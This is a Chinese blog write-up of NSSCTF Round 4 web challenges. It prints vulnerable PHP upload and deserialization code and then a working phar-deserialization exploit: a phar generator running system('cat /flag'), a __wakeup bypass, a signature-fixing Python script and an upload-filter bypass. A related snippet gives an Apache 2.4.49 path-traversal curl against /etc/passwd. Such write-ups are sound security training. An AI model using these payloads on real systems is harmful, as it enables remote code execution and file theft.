[NSSCTF]roud4 web

最新推荐文章于 2024-10-27 16:57:38 发布
原创 最新推荐文章于 2024-10-27 16:57:38 发布 · 747 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

本文介绍了一种通过构造特定的PHP对象进行反序列化攻击的方法,并详细展示了如何绕过安全检查实现远程代码执行的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1zweb/(revenge)

非预期:直接读/flag

读一下index.php

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

upload.php

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }

很明显是一个phar反序列化:

<?php
class LoveNss{
    public $ljt = "Misc";
    public $dky = "Re";
    public $cmd = "system('cat /flag');";
}

$a=new LoveNss();
unlink('phar.phar');
$phar = new Phar('phar.phar');
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('1.txt','dky');
?>

由于需要绕过wakeup方法,所以需要修改一下属性,修改属性之后同时需要修改签名

O:7:"LoveNss":4:{s:3:"ljt";s:4:"Misc";s:3:"dky";s:2:"Re";s:3:"cmd";s:20:"system('cat /flag');";}

修改签名

import gzip
from hashlib import sha1
f = open('phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('pha.phar', 'wb').write(newf) # 写入新文件

之后在文件上传页面对字符进行了过滤,我们可以利用zip压缩的方式绕过,压缩后更改后缀为png上传

file=phar://./upload/pha.png/pha.phar

ez_rce

Apache2.4.49目录穿越

image-20220805101126172

这里构造了几层套娃,爆破一下

image-20220805101605257

得到flag

image-20220805102051567

共享天下三级C语言上机100题背诵版(roud原创)
09-20
标题中的“共享天下三级C语言上机100题背诵版(roud原创)”表明这是一个针对C语言上机考试的习题集,由roud原创,包含100道题目,主要面向的是三级C语言的学习者。描述中的“三级c语言上机题”进一步确认了这是针对...
文件上传与Phar反序列化的摩擦
Aiwin的博客
11-03 2551
文件上传与Phar反序列化的摩擦和例题
[NSSRound#4 SWPU]1zweb
m0_70819573的博客
03-13 888
index.php中只需要绕过_wakeup魔术方法就行了,可以考虑增加自然属性个数或增加属性个数来绕过,因为upload.php会检查stub,所以压缩文件成zip(注意要用winhex改变属性个数,不然签名会改变),用phar://伪协议来读取文件。得到aa.phar.gz,改文件名为1.jpg上交,用phar读取发现签名损坏,所以要进行签名修复,phar由data,data签名(20位),和签名格式(8位)组成。可以用读取文件读取index.php,upload.php的源码。
[nssround#4 swpu]1zweb
weixin_44833249的博客
10-27 744
echo "上传成功 ./upload/".$_FILES["file"]["name"];- 后缀检测:php识别phar文件是靠其文件头的stub,也就是`__HALT_COMPILER();echo $_FILES["file"]["name"] . " 文件已经存在";文件上传处不仅限制了后缀名,还判断了文件内容有没有`__HALT_COMPILER();
[NSSRound#4] 复现
qq_61768489的博客
08-12 1562
可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点。zip打不开,是把zip文件头换成rar了,换回去。.....
NSSROUND 1zweb(revenge)刷题心得
m0_74925562的博客
01-06 534
首先有一个查询文件的功能和一个文件读取的功能,一开始以为是文件上传的漏洞,嘎嘎传(虽然我也不太熟悉文件上传),后面发现不行,应该是网站在后端限制了文件上传的后缀,观察到这里有个文件查询的功能应该是文件读取,试一下直接读flag。通过代码审计,我们可以看到,这里有php的魔术方法,有对flag的正则匹配限制,但是这里没有unserialize()函数,猜想这里应该是利用了phar协议的反序列化来拿flag。php代码审计,文件读取漏洞,文件上传绕过,phar协议反序列化漏洞。通过winhex来修改属性个数。
ROUD数据集
03-25
好的,用户正在寻找名为“ROUD”的数据集,但根据提供的引用内容,可能出现了拼写错误或者名称混淆。首先,我需要检查现有的引用信息,看看是否有类似名称的数据集。引用[1]提到了“rumdect.zip”数据集,这可能与...
matlab中roud
08-09
% 输出4 ``` 除了将数值四舍五入到最接近的整数,`round`函数还可以指定小数点后保留的位数。例如,将3.14159保留两位小数: ```matlab x = 3.14159; result = round(x, 2); disp(result); % 输出3.14 ``` 希望...
roud水下数据集
最新发布
06-01
MARIDA 是一个基于多光谱 Sentinel-2 卫星数据的数据集,旨在区分海洋碎片与其他海洋特征,如马尾藻大型藻类、船舶、天然有机材料等[^4]。它适用于开发和评估基于人工智能和深度学习架构的海洋碎片检测解决方案。 ...
postgresql roud向下取证
12-26
4. **外连接与分页**:如果数据量大到无法一次性加载,可以分页获取,然后合并成小批量样本。 尽管如此,PostgreSQL本身并没有内置的"精确"向下取样功能,一般需要用户自行设计SQL脚本来实现需求。在实际应用中,应...
Web】Phar反序列化相关例题wp
uuzeray的博客
11-12 548
标准的phar反序列化file_exists触发贴出构造dirsearch扫出/upload.php,访问可以发现上传文件,但限制只能上传图片问题不大,php识别phar文件是通过其文件头的stub,更确切一点来说是这段代码,对前面的内容或者后缀名是没有要求的,可以直接修改为其他后缀bp抓包改后缀和MIMEphar文件上传成功 ,接下来就是如何触发的问题了过于明显不解释payload:?
每日练习-NSSRound#4 SWPU-1zweb
m0_68113265的博客
08-21 298
upload限制了phar文件的上传。同时设置了白名单,只允许png,jpg,gif文件上传.这段代码,对前面的内容或者后缀名是没有要求的,可以直接修改为其他后缀。phar由data,data签名(20位),和签名格式(8位)组成。只要将phar文件使用 gzip 命令进行压缩,这段代码就会消失。php识别phar文件是通过其文件头的stub,更确切一点来说是。生成phar文件,同时放入010增加属性数量来绕过weak_up。接着就是修复phar签名以及压缩。上传成功之后,查询文件。
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
Web】NSSRound#1-20 Basic 刷题记录(全)
uuzeray的博客
04-11 3152
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。
【phar反序列化学习】
hcja666的博客
04-12 1391
phar反序列化皮毛学习。
php反序列化漏洞——phar反序列化漏洞
m0_73756016的博客
04-01 1512
类比java语言JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。文件包含:phar伪协议,可读取 .phar文件。
NSSCTF做题(8)
wwwwyyyrre的博客
10-11 473
看到了js代码有一个base64编码,解密最后发现这是一个加密方式去掉空格之后得到了flag。
nssctf round#4
weixin_63231007的博客
08-21 1503
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。怎么通过脚本直接修改这个phar文件里序列化好的数据来绕过wakeup这部分我不清楚,查看wp之后需要生成phar文件后,自己手动修改文件数据,用到脚本修改签名。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值